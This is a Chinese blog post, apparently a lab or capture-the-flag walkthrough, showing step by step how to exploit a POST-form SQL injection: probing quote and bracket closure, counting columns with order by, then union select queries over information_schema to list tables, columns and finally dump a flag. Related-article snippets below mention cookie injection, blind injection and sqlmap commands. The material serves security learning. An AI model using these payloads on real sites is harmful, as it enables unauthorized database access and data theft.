特别详细的POST 注入 思路

最新推荐文章于 2024-05-21 08:03:35 发布
最新推荐文章于 2024-05-21 08:03:35 发布
阅读量1.2w 收藏 40
点赞数 8
分类专栏: 注入 文章标签: post注入 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42097777/article/details/89088142
版权

post注入是通过对输入框进行传参,可以被带入数据库进行的查询

# 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询

1.查询是否有注入点
对输入框填入一些闭合的符号,看页面是否异常
例如: ’        "          ')          ")
填入 ’
在这里插入图片描述
页面正常,
在填入 "
在这里插入图片描述
页面发生错误,证明 " 闭合有效
输入:“and1=1#
在这里插入图片描述
竟然也显示报错,因为填入and 1=1 是肯定成立不会报错的,这里显示异常,所以证明不单单是"闭合,可能还有个括号没闭合
输入 “)and 1=1#
在这里插入图片描述
页面显示正常,证明有注入点,并要用”)进行闭合,方可进行查询
2。order by 语句查询有几个字段
例:”)order by 3# 出错,
")order by 2# 显示正确,判断为2个字段
在这里插入图片描述
3.使用union 联合查询 显错点,输出点
语句:
") union select 1,2#
在这里插入图片描述
4.查询当前库名
语句:
") union select 1,database()#
在这里插入图片描述

当前库名为security
5。查表名,利用当前库名查系统表
语句:
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=“security” #
在这里插入图片描述
6。查字段名
语句:
") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“zkaq” #
在这里插入图片描述
7.查表内的信息
语句:
")union select group_concat(flag),group_concat(zKaQ) from zkaq #
在这里插入图片描述
我们想要的表内的所有信息如图展示

我们也得到了我们需要的信息:flag为:zKaQ-P0stD0ubl4

liam liang
关注
  • 8
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
手动mysql注入+post请求注入(学习) 2018/11/13
weixin_43689084的博客
11-13 3184
sql注入中Mysql常用的数据库: information_schema.tables ; 记录了数据库中所有的表名 information_schema.columns; 记录了数据库中所有的列名 在有错误回显的注入过程中,注入过程大致如下: 利用‘id = 1 and 1=1 ’&&‘id =1 and 1=2’ 判断是否存在注入点。 利用order by 语句确认...
MYSQL POST注入详解
AaronLuo
09-01 3408
POST注入产生的原因 在登录处,用于判断用户名、密码会使用select语句 在修改密码出,更新密码,会使用到update语句 在商城系统中,订单的添加,删除,可能会使用到insert,delete语句 HTTP之POST请求 HTTP报文分为三部分,分别为请求行,请求头,请求请求行:由请求方法字段、URL字段和HTTP协议版本字段3个字段组成 请求头:由关键字/值对组成,每行一对,关...
SQL注入post注入
banliyaoguai的博客
05-21 834
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
POST注入
qq_45031509的博客
04-15 2669
POST注入 ①除了在url中体提交,也可以在网页输入上提交,如果需要与数据库连接的话就可能会存在注入,数据需要抓包才能看见。 ② 产生的地方,多半出现在登录框,查询框,等各种和数据库有交互的框数据。 ③提交方式,与参数类型(单引,双引的干扰) 案列(实验环境,SQlilabs 十一关) 1)抓包结果可以看出,账户,密码的提交方式,猜测可能有注入点 2)判断注入为字符型注入 3)猜测字段数为2 4)联合查询,查询数据库名与数据库用户 SELECT username, password FR
POST注入(一)
qq_45300786的博客
07-04 9009
POST(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-05/index.php 攻击流程:     1;判断是否存在sql注入漏洞。     2;判断网页存在字段数。     3;判断回显点。     4;获取信息。   测试开始:     测试目标获取管理员账密码 GET/POST 区别: GET传参的数据有限,比较少 POST传参的数据可以比较大 可以达到很多效果 —— 文件上传 GET传参会经过URL编码 POST不会URL编码,比如注释符:#的UR
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4924
SQL注入原理-POST注入
小迪教程第七天——提交方式注入
仲夏
10-17 943
1.GET<?php //get方式传递 $id=$_GET['id']; echo $id;?>2.POST<?php //post方式传递 $id=$_POST['id']; echo $id;?>3.COOKIE<?php //cookie方式传递 $id=$_COOKIE['id']; echo $id;?>4、cookie和session认识Cookie:可以接受数据,验证用户的凭据,存储
NET邮件收发程序ASP毕业设计(源代码+论文).zip
08-27
"ASP.NET邮件收发程序的设计与开发(源代码+论文)"是压缩包内的主要文件,可能包含了关于项目设计的详细文档,其中包括源代码(用于实现邮件收发功能的编程代码)和论文(详细解释设计思路、技术选型、功能实现及可能...
ASP+ACCESS基于WEB网上留言板(源代码+论文).zip
最新发布
05-26
8. **论文部分**:可能包含了对项目的背景介绍、设计思路、实现步骤、功能分析和技术难点的详细讨论,以及可能的改进和扩展方向。 9. **源代码分析**:深入研究源代码可以帮助理解ASP和ACCESS的集成方式,以及如何...
android 社区源码(开源中国)
06-19
下面,我们将详细探讨其中涉及的关键技术和设计思路。 一、用户登录模块 在Android应用中,用户登录是基础功能,涉及到身份验证和安全。开源中国社区的源码中,可能采用了常见的OAuth2.0或JWT(Json Web Token)...
基于PHP的MineVotePHP投票系统源码.zip
08-27
3. **表单处理**:投票过程涉及表单提交,源码中应有处理POST请求的部分,包括验证用户输入、防止SQL注入等安全措施。 4. **投票逻辑**:系统可能采用特定算法处理投票结果,如计算票数、统计百分比等,这涉及到PHP...
Python课程设计:个人信息管理系统
03-13
在项目完成后,需要编写一份详细的课程设计报告,阐述系统的设计思路、技术选型、实现过程以及遇到的问题与解决方案。报告中还应包含系统功能截图、数据库模型图和部分关键代码片段,以便于理解。 通过这个项目,...
手工post注入mysql_SQL手工注入
weixin_35713476的博客
02-04 997
转自http://www.vuln.cn/9027我是技术不高,但我能带你入门我遇到过无数人曾来像我表示自己想学网络安全,走了很多弯路,求师被骗过很多钱。这样的人我没办法帮助太多,限于时间精力与能力,帮得了1个帮不了100个,再说我也不是昔日的雷锋了。如今我也基本上不做渗透了,回过头看到几年前自己笔记中有一些注入笔记,虽然我没有大牛水平,没有高端操作,但我希望我能把我仅有的一些技术与资源,能够最大...
SQL 数据库一些判断代码(可以用做入侵小心)
生活要快乐 - 魏言
06-17 1059
判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0and 03.猜帐数目 如果遇到0and 0and 14.猜解字段名称 在len( ) 括里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*) >0)-- a
post 未经授权_意大利后台登录框POST注入实战
weixin_39673002的博客
12-03 378
0x01 前言这篇文章记录的是当时利用SQLMAP和手工方式对某“意大利网站后台登录框POST注入”的过程,POST注入漏洞一般存在于网站搜索查询框、前/后台登录框等功能。以前也一直想写一篇关于POST注入的文章,可惜一直没找到用于演示的网站,朋友@冷空气给我发了一个,感谢!0x02 Sqlmap注入后台登陆框打开目标网站后台,登录帐文本框中输入个'单引来简单判断是存在SQL注入漏洞...
关于sql注入之cookie注入
热门推荐
我的天,bug!
06-08 1万+
INFO:sql注入我想很多人都接触过,大多数都是接触得get 和post注入的形式,你或是用手工,或是用工具,cookie注入也是一样,今天就给大家讲一讲cookie如何注入,考虑到大家的实际情况,这里就不通过手工来进行,我们就借助一些工具来完成。(大牛看到请不要打我~~) 小知识:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服
记一次POST数据中JSON参数存在SQL延时盲注
weixin_42675091的博客
03-21 427
4.还一个重要的点,,没加端口使用sqlmap跑的时候,开始跑之前就会出302,让我选y,可能是没加端口的时候是80端口,所以302到443,,但这时候跑不出来,且看sqlmap的响应包中每个请求都有302响应,给人感觉一直请求的目标就不对。6.最开始的时候,还出现了payload加在””后面,如”name”:”” ‘ and select,最后跑不出来,后来直接将name的值的””删除,发现payload正常了。7.后面又发现可以直接将type参数删除,只保留name也能行,可避免注到type中去。
整理post提交数据的四种解析方式
weixin_33819479的博客
07-19 378
Content-Type post方法提交的数据被规定放在消息主体(entity-body)中,但是并没有规定提交数据是什么编码方式,以什么方式解析。 服务端通常是根据请求头(headers)中的 Content-Type字段来获知请求中的消息主体是用何种方式编码,再对主体进行解析。 X-Requested-With字段是否存在,是同步还是异步请求。 X-Requested-With reques...
sqlmap post注入方法
09-20
sqlmap是一种常用的自动化SQL注入工具,可以用于测试和发现应用程序中的SQL注入漏洞。在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` 2. 使用`--data`参数指定POST请求的数据,例如:`--data "n=1&p=1"` 3. 输入命令`sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"`来执行注入攻击 请注意,这只是一个简单的示例,实际使用时可能需要根据具体情况进行参数的调整。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值